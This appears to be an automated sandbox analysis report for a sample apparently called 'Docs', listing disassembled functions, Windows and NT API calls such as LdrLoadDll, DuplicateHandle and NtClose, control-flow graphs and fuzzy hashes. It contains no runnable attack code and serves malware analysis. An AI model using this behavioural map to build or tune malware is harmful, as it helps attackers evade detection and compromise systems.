                                                              Function 00E8590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 548 e8590c-e85914 549 e85918-e859d9 CreateActCtxA 548->549 551 e859db-e859e1 549->551 552 e859e2-e85a3c 549->552 551->552 559 e85a4b-e85a4f 552->559 560 e85a3e-e85a41 552->560 561 e85a60 559->561 562 e85a51-e85a5d 559->562 560->559 564 e85a61 561->564 562->561 564->564
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00E859C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 3cefb3417dc07b5502809cde56b2ae6fc0848a91beda81ceccb93fb575ed4ee8
                                                              • Instruction ID: 20fa70909c909b4b98af78054968222de3eaa88083a3bf953c7452b774cc4a10
                                                              • Opcode Fuzzy Hash: 3cefb3417dc07b5502809cde56b2ae6fc0848a91beda81ceccb93fb575ed4ee8
                                                              • Instruction Fuzzy Hash: 4141EFB1C00A1DCFDB24DFA9C884ACEBBB5BF88304F20815AD408AB255DB756945CF91
                                                              Function 00E844B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 565 e844b0-e859d9 CreateActCtxA 568 e859db-e859e1 565->568 569 e859e2-e85a3c 565->569 568->569 576 e85a4b-e85a4f 569->576 577 e85a3e-e85a41 569->577 578 e85a60 576->578 579 e85a51-e85a5d 576->579 577->576 581 e85a61 578->581 579->578 581->581
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00E859C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: d927b58300a1f637174f3e8860529ded9ff956575c7858a1bf78fbee2f0d7ef4
                                                              • Instruction ID: 1b36799cf3499a010452b91eaa3e969aff8e4a484613ef3219f1ebccf3be5936
                                                              • Opcode Fuzzy Hash: d927b58300a1f637174f3e8860529ded9ff956575c7858a1bf78fbee2f0d7ef4
                                                              • Instruction Fuzzy Hash: 3E41DFB1C00B1DCBDB24DFA9C884BDEBBB5BF88304F20816AD409AB255DB756945CF91
                                                              Function 07233F90 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 582 7233f90-7233fe4 583 7233fe6-7233fec 582->583 584 7233fef-7233ffe 582->584 583->584 585 7234003-723403c DrawTextExW 584->585 586 7234000 584->586 587 7234045-7234062 585->587 588 723403e-7234044 585->588 586->585 588->587
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0723402F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: 734a7d6bb3b90ca8650b27bc9d6f4b20694c2d55e413743faf6c8917e4daf1f6
                                                              • Instruction ID: b9f6428f77ac60db95561d8c756f198bcc009fc3066fe4fbf231c4af8fd024ee
                                                              • Opcode Fuzzy Hash: 734a7d6bb3b90ca8650b27bc9d6f4b20694c2d55e413743faf6c8917e4daf1f6
                                                              • Instruction Fuzzy Hash: C431E2B5D1034A9FDB10CF99D884ADEBBF4FB48310F14842AE819A7310D774A945CFA0
                                                              Function 07233F98 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 591 7233f98-7233fe4 592 7233fe6-7233fec 591->592 593 7233fef-7233ffe 591->593 592->593 594 7234003-723403c DrawTextExW 593->594 595 7234000 593->595 596 7234045-7234062 594->596 597 723403e-7234044 594->597 595->594 597->596
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0723402F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: ef3b81d038332914f7e04d95e737b1aa9e7c0b6d6996cc7b5202021cb6a0b695
                                                              • Instruction ID: 8f8dbe87eda5d2a56a72af4635dac1f9205201620fdc74873cba838216691864
                                                              • Opcode Fuzzy Hash: ef3b81d038332914f7e04d95e737b1aa9e7c0b6d6996cc7b5202021cb6a0b695
                                                              • Instruction Fuzzy Hash: CE21E0B5D1034A9FCB10CF9AD884AAEFBF4FB48310F14842AE819A7310D775A944CFA1
                                                              Function 00E8D2FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 600 e8d2fc-e8d7a4 DuplicateHandle 602 e8d7ad-e8d7ca 600->602 603 e8d7a6-e8d7ac 600->603 603->602
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E8D6D6,?,?,?,?,?), ref: 00E8D797
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: d62366067176c245cb47e968059fe8768ca3413460a5b935fc2f232dd65b8a2b
                                                              • Instruction ID: d74f0ac817a29522bce02b75081fac6033470fe08c9743f0f932ebec70dafe17
                                                              • Opcode Fuzzy Hash: d62366067176c245cb47e968059fe8768ca3413460a5b935fc2f232dd65b8a2b
                                                              • Instruction Fuzzy Hash: 4121E3B5D00249AFDB10DF9AD984ADEBBF8FB48310F14841AE918B3350D379A954CFA5
                                                              Function 00E8D709 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 606 e8d709-e8d7a4 DuplicateHandle 607 e8d7ad-e8d7ca 606->607 608 e8d7a6-e8d7ac 606->608 608->607
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E8D6D6,?,?,?,?,?), ref: 00E8D797
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: ac1ba65ca16159a3ecdaebf56ea2d6109fd987968d3ca479f6b7c712fb230af0
                                                              • Instruction ID: 2929e5fa63acddd7885bbce83cfde36a6ea58d788343d954013be0b5e57f670d
                                                              • Opcode Fuzzy Hash: ac1ba65ca16159a3ecdaebf56ea2d6109fd987968d3ca479f6b7c712fb230af0
                                                              • Instruction Fuzzy Hash: 3321E2B5D002499FDB10CFA9D985AEEBBF4FB48310F14842AE918B3350D378A954CF65
                                                              Function 00E8B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 611 e8b018-e8b058 612 e8b05a-e8b05d 611->612 613 e8b060-e8b08b GetModuleHandleW 611->613 612->613 614 e8b08d-e8b093 613->614 615 e8b094-e8b0a8 613->615 614->615
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E8B07E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 02ea97ee2574705a330789c0f8e41077b7fb2b76f011d5594d4681426573e16a
                                                              • Instruction ID: 0b60799b3c3f2a4331566210c0dadb1fa4243b5ef81b8cd78b3e7ec01f82e719
                                                              • Opcode Fuzzy Hash: 02ea97ee2574705a330789c0f8e41077b7fb2b76f011d5594d4681426573e16a
                                                              • Instruction Fuzzy Hash: 1611DFB5C003498FCB20DF9AD844A9EFBF8EB88314F14841AD869B7210D379A545CFA1
                                                              Function 072362BC Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07236B79,?,?), ref: 07236D20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: a2dc0e0959e4b69279c1a43e8178bb83a3a2d5095ba861b414c6ee0da46e47a2
                                                              • Instruction ID: 5bc9cbcdbc2fa2d482115864fc86913bebd950e7c8fe0c7527aa22528aadef72
                                                              • Opcode Fuzzy Hash: a2dc0e0959e4b69279c1a43e8178bb83a3a2d5095ba861b414c6ee0da46e47a2
                                                              • Instruction Fuzzy Hash: 0C1155B5C103499FCB20DF99C548BDEBBF8EB48320F108419E959A7340C338A944CFA5
                                                              Function 07236CC7 Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07236B79,?,?), ref: 07236D20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: e2262113a335bc5bcd0368f811149e6556087e6b75eebdd7d6e974b2ee744003
                                                              • Instruction ID: a20f51fc51dc13ee28cbe6f1fa1bc73fb6f28e429c1eb5e91ba44cbb3f21044e
                                                              • Opcode Fuzzy Hash: e2262113a335bc5bcd0368f811149e6556087e6b75eebdd7d6e974b2ee744003
                                                              • Instruction Fuzzy Hash: FA1103B5C102499FCB20DF99D549BDEBBF4EF48320F24841AD568A7740D338A544CFA5
                                                              Function 00E2D3D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060863832.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e2d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00135608aeddd0e644ba03fb126dbf18e1d99d34911a14afdf7070f649e1e1d1
                                                              • Instruction ID: ad3dbeff5c2179993279a9cc72adb15f5200c16746e89682274be1ff9fb80708
                                                              • Opcode Fuzzy Hash: 00135608aeddd0e644ba03fb126dbf18e1d99d34911a14afdf7070f649e1e1d1
                                                              • Instruction Fuzzy Hash: 7A2148B1508204DFDB04EF04EDC0B16BF65FB94324F34C569DA0A5B246C336E856C6A1
                                                              Function 00E3D1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060927889.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e3d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d621eba620d75bda4019881b612c5ccfca20402f5056fd72e6fcb5818f14d50
                                                              • Instruction ID: 8d69acc3579ce0cd58e8bff738fbc9cf1ada641b62920787ddddf9de49d6f9d0
                                                              • Opcode Fuzzy Hash: 8d621eba620d75bda4019881b612c5ccfca20402f5056fd72e6fcb5818f14d50
                                                              • Instruction Fuzzy Hash: 242126B1508204EFDB05DF54EDC8B26BFA5FB84318F34C5ADE8495B2A2C736D816CA61
                                                              Function 00E3D01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060927889.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e3d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a58889a1a9ecda57ce8a354db642a73a6701719ccc0205e42970fca3acc86be
                                                              • Instruction ID: a5d61e912a7e3eb4e5f672f4400a463ee6c7a0f447157c6d56cd3210196e2e65
                                                              • Opcode Fuzzy Hash: 6a58889a1a9ecda57ce8a354db642a73a6701719ccc0205e42970fca3acc86be
                                                              • Instruction Fuzzy Hash: 5F21D3B1508240DFDB18DF14E9C8B16BFA6EB84718F24C569D84A5B296C336D807CA61
                                                              Function 00E3D005 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060927889.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e3d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c0727156b658684e8c03e300b1b1e531d2947a2f253f6351439af52dcde984c
                                                              • Instruction ID: 964c406fc99fc3d14d11975c31e401f6fd1db5e9db8572c5eba7607eada12606
                                                              • Opcode Fuzzy Hash: 0c0727156b658684e8c03e300b1b1e531d2947a2f253f6351439af52dcde984c
                                                              • Instruction Fuzzy Hash: 5121807550D3808FCB06CF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                                                              Function 00E2D3D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060863832.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e2d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction ID: 7be6b237a32620c224286fb16728e817a685e85f95bb4362971ccc31e8f133b2
                                                              • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction Fuzzy Hash: 2B112672408280CFDB12DF00E9C4B16BF71FB94324F24C2A9D9094B656C33AE85ACBA1
                                                              Function 00E3D1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060927889.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e3d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                              • Instruction ID: dec0019366d9474f3efd798400953180af14cca72e7d6f9a3ac77159b694d92d
                                                              • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                              • Instruction Fuzzy Hash: 1F11BE75508240DFCB02CF50D9C4B16BF61FB84318F24C6A9D8494B666C33AD81ACB51
                                                              Function 00E2D745 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060863832.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e2d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3194ac73d4e4115061341e8fc7b50b02a1c5ddca8a40e5574eb2fc1f09cd87b6
                                                              • Instruction ID: 61c4b9a503f924c92bd767041156f428ecc919f28d1b842b2f404372222756be
                                                              • Opcode Fuzzy Hash: 3194ac73d4e4115061341e8fc7b50b02a1c5ddca8a40e5574eb2fc1f09cd87b6
                                                              • Instruction Fuzzy Hash: AE012B7100C3509AE7104F19EDC4BA7BF98DF45324F28D51BEE095A286D33D9845CAB1
                                                              Function 00E2D744 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060863832.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e2d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a019f79a46bf4f300d4472615f4f9063989da7ea38f1c0ce16ff73e6c512fcc2
                                                              • Instruction ID: 5d13571f723279420963730e7279de31439723630bdfeb9653227d4f370c17f2
                                                              • Opcode Fuzzy Hash: a019f79a46bf4f300d4472615f4f9063989da7ea38f1c0ce16ff73e6c512fcc2
                                                              • Instruction Fuzzy Hash: C7F0C2714083409EE7108F19DC88B62FF98EF51334F18C45AFD481A286C3799844CAB0

                                                              Non-executed Functions

                                                              Function 0723AA4F Relevance: 4.0, Strings: 3, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJuq$Tepq$xbsq
                                                              • API String ID: 0-3289896765
                                                              • Opcode ID: 500580c1e805e36844270a6fc600469f31b258a1406389b76e30b46c7c7c0da7
                                                              • Instruction ID: 6358dfaa136af1c83fadeaae0dcf9269362c96e2e2543c73c8c73a1311277ada
                                                              • Opcode Fuzzy Hash: 500580c1e805e36844270a6fc600469f31b258a1406389b76e30b46c7c7c0da7
                                                              • Instruction Fuzzy Hash: B2C197B5E10618CFDB58CF6AD9446DDBBF2BF89301F14C0AAD409AB325DB305A858F50
                                                              Function 0723A7C8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'pq
                                                              • API String ID: 0-1798494419
                                                              • Opcode ID: 5b674e8481ffbf6e275d9251041f8574a821dee720d32684a238560a4907b2b5
                                                              • Instruction ID: 61e724f51efe363a9857b90755596cc31eceb478eb3249a81d1c1a9c800a246d
                                                              • Opcode Fuzzy Hash: 5b674e8481ffbf6e275d9251041f8574a821dee720d32684a238560a4907b2b5
                                                              • Instruction Fuzzy Hash: BF612DB0E1120A9FE749DF7AE98565ABBF3EF89300F14D429E404A7368EA7519468F40
                                                              Function 00E8D63C Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d08e1ea9302dd77315675e1b014441421e7953c7f855a509947aaed1e3bb71e
                                                              • Instruction ID: c94a6a8ad586d0e663dce81f348dd56fce034cc850c477b24f5b666db1346203
                                                              • Opcode Fuzzy Hash: 7d08e1ea9302dd77315675e1b014441421e7953c7f855a509947aaed1e3bb71e
                                                              • Instruction Fuzzy Hash: C4A15E36E102058FCF05EFA4D8405DEB7B2FF89304B25957AE909BB265DB71E916CB80

                                                              Execution Graph

                                                              Execution Coverage:1.2%
                                                              Dynamic/Decrypted Code Coverage:5.1%
                                                              Signature Coverage:8%
                                                              Total number of Nodes:137
                                                              Total number of Limit Nodes:11
                                                              execution_graph 96449 42fa63 96450 42fa73 96449->96450 96451 42fa79 96449->96451 96454 42eaa3 96451->96454 96453 42fa9f 96457 42cc63 96454->96457 96456 42eabb 96456->96453 96458 42cc7d 96457->96458 96459 42cc8b RtlAllocateHeap 96458->96459 96459->96456 96460 4250a3 96464 4250bc 96460->96464 96461 425104 96468 42e9c3 96461->96468 96464->96461 96465 425144 96464->96465 96467 425149 96464->96467 96466 42e9c3 RtlFreeHeap 96465->96466 96466->96467 96471 42cca3 96468->96471 96470 425114 96472 42ccbd 96471->96472 96473 42cccb RtlFreeHeap 96472->96473 96473->96470 96561 424d13 96562 424d2f 96561->96562 96563 424d57 96562->96563 96564 424d6b 96562->96564 96565 42c953 NtClose 96563->96565 96566 42c953 NtClose 96564->96566 96568 424d60 96565->96568 96567 424d74 96566->96567 96571 42eae3 RtlAllocateHeap 96567->96571 96570 424d7f 96571->96570 96572 42bfb3 96573 42bfcd 96572->96573 96576 15e2df0 LdrInitializeThunk 96573->96576 96574 42bff2 96576->96574 96577 41b653 96578 41b697 96577->96578 96579 41b6b8 96578->96579 96580 42c953 NtClose 96578->96580 96580->96579 96581 41a8f3 96582 41a962 96581->96582 96583 41a90b 96581->96583 96583->96582 96585 41e833 96583->96585 96586 41e859 96585->96586 96590 41e94d 96586->96590 96591 42fb93 96586->96591 96588 41e8eb 96589 42c003 LdrInitializeThunk 96588->96589 96588->96590 96589->96590 96590->96582 96592 42fb03 96591->96592 96593 42fb60 96592->96593 96594 42eaa3 RtlAllocateHeap 96592->96594 96593->96588 96595 42fb3d 96594->96595 96596 42e9c3 RtlFreeHeap 96595->96596 96596->96593 96597 4143b3 96598 4143cd 96597->96598 96603 417b63 96598->96603 96600 4143e8 96601 41442d 96600->96601 96602 41441c PostThreadMessageW 96600->96602 96602->96601 96604 417b87 96603->96604 96605 417b8e 96604->96605 96606 417bca LdrLoadDll 96604->96606 96605->96600 96606->96605 96607 4190f8 96608 42c953 NtClose 96607->96608 96609 419102 96608->96609 96474 40192a 96475 40192e 96474->96475 96476 40198b 96475->96476 96479 42ff33 96475->96479 96482 42e573 96479->96482 96483 42e599 96482->96483 96494 407403 96483->96494 96485 42e5af 96486 401a50 96485->96486 96497 41b463 96485->96497 96488 42e5ce 96489 42e5e3 96488->96489 96512 42cce3 96488->96512 96508 428563 96489->96508 96492 42e5fd 96493 42cce3 ExitProcess 96492->96493 96493->96486 96515 416823 96494->96515 96496 407410 96496->96485 96498 41b48f 96497->96498 96533 41b353 96498->96533 96501 41b4bc 96502 41b4c7 96501->96502 96539 42c953 96501->96539 96502->96488 96503 41b4d4 96504 41b4f0 96503->96504 96506 42c953 NtClose 96503->96506 96504->96488 96507 41b4e6 96506->96507 96507->96488 96509 4285c5 96508->96509 96511 4285d2 96509->96511 96547 4189c3 96509->96547 96511->96492 96513 42cd00 96512->96513 96514 42cd11 ExitProcess 96513->96514 96514->96489 96516 416840 96515->96516 96518 416853 96516->96518 96519 42d393 96516->96519 96518->96496 96521 42d3ad 96519->96521 96520 42d3dc 96520->96518 96521->96520 96526 42c003 96521->96526 96524 42e9c3 RtlFreeHeap 96525 42d452 96524->96525 96525->96518 96527 42c01d 96526->96527 96530 15e2c0a 96527->96530 96528 42c046 96528->96524 96531 15e2c1f LdrInitializeThunk 96530->96531 96532 15e2c11 96530->96532 96531->96528 96532->96528 96534 41b36d 96533->96534 96538 41b449 96533->96538 96542 42c093 96534->96542 96537 42c953 NtClose 96537->96538 96538->96501 96538->96503 96540 42c96d 96539->96540 96541 42c97b NtClose 96540->96541 96541->96502 96543 42c0b0 96542->96543 96546 15e35c0 LdrInitializeThunk 96543->96546 96544 41b43d 96544->96537 96546->96544 96549 4189ed 96547->96549 96548 418edb 96548->96511 96549->96548 96555 414033 96549->96555 96551 418b0e 96551->96548 96552 42e9c3 RtlFreeHeap 96551->96552 96553 418b26 96552->96553 96553->96548 96554 42cce3 ExitProcess 96553->96554 96554->96548 96556 414050 96555->96556 96559 4140b6 96556->96559 96560 41b773 RtlFreeHeap LdrInitializeThunk 96556->96560 96558 4140ac 96558->96551 96559->96551 96560->96558 96610 413ebc 96611 413ed0 96610->96611 96612 413e64 96610->96612 96615 42cbd3 96612->96615 96616 42cbed 96615->96616 96619 15e2c70 LdrInitializeThunk 96616->96619 96617 413e75 96619->96617 96620 15e2b60 LdrInitializeThunk

                                                              Executed Functions

                                                              Function 00417B63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 388 417b63-417b7f 389 417b87-417b8c 388->389 390 417b82 call 42f5a3 388->390 391 417b92-417ba0 call 42fba3 389->391 392 417b8e-417b91 389->392 390->389 395 417bb0-417bc1 call 42e043 391->395 396 417ba2-417bad call 42fe43 391->396 401 417bc3-417bd7 LdrLoadDll 395->401 402 417bda-417bdd 395->402 396->395 401->402
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction ID: 122384901a9c5e31b0cbf47cd83ed5cb9323d92cb62f98cf8b450b2778bc3db3
                                                              • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction Fuzzy Hash: D60171B1E0420DBBDF10DBE1DC42FDEB3789B14308F4081AAE90897241F639EB588B95
                                                              Function 0042C953 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                              • Instruction ID: a1a1041c0e6c1b94269db6ff4cf73d3451205fe7691f058a31b8fa4964ffe1e3
                                                              • Opcode Fuzzy Hash: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                              • Instruction Fuzzy Hash: 2EE08676300614BBD510FA5ADC01F97775CEFC6714F404419FA4867341D675B91487F4
                                                              Function 015E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
